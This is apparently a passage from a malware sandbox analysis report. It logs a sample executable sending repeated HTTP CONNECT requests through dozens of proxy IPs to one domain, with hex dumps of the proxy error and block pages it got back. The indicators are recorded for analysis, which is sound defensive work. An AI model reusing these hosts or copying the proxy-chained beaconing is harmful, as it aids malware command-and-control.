65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1770192.168.2.454151171.244.140.160424566812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.453958035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1771192.168.2.454932104.244.75.78315346812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.455248117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1772192.168.2.454353189.240.60.16690906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.469189882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.659734964 CET72INHTTP/1.1 200 Connection established
                                                                                                      Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1773192.168.2.452964149.172.228.208806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.482726097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.681287050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1774192.168.2.45491137.32.15.12568886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.487570047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179014921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.975339890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.651649952 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1775192.168.2.454943192.252.216.8141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.498826027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1776192.168.2.452956193.34.93.221338616812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.499670029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1777192.168.2.454941201.184.159.2856786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.499783039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1778192.168.2.454933185.158.114.14265866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.511596918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1779192.168.2.454749165.140.166.17731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.539427996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557790041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1780192.168.2.454253166.62.38.100556716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.539520979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557667971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.599612951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1781192.168.2.454236163.172.158.70163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.553942919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557781935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.599683046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1782192.168.2.454759178.33.162.89580206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.560787916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557708025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.599685907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.646883011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.646784067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.646791935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:19.673885107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1783192.168.2.454272172.83.159.6531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.561084986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.740525961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.740936995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1784192.168.2.450070152.228.140.225281196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.568715096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.740546942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1785192.168.2.454744104.238.111.107537776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.569111109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1786192.168.2.45443794.130.171.22131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.569650888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.740585089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1787192.168.2.454369207.180.235.153552256812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.573905945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.740649939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.740938902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.834389925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.834364891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.834254980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:19.912455082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1788192.168.2.45429351.210.4.123586536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.574093103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1789192.168.2.450100190.232.89.12556786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.600795984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1790192.168.2.454930109.123.254.43420486812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.604475021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.365586996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.178569078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1791192.168.2.450083188.164.196.30494266812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.605164051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.740849972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.741060019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.834389925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.834364891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.834281921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:19.912455082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1792192.168.2.450105178.33.252.18931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.614289045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.681704998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:59.341161966 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1793192.168.2.45018991.134.140.160208966812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.619894028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.681726933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.682569981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.684109926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.709255934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1794192.168.2.454964104.129.205.25543216812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.623981953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.731595039 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Content-Type: text/html
                                                                                                      Server: Zscaler/6.2
                                                                                                      Cache-Control: no-cache
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Content-length: 13837
                                                                                                      Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 73 65 63 75 72 69 74 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 74 77 6f 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 68 65 69 67 68
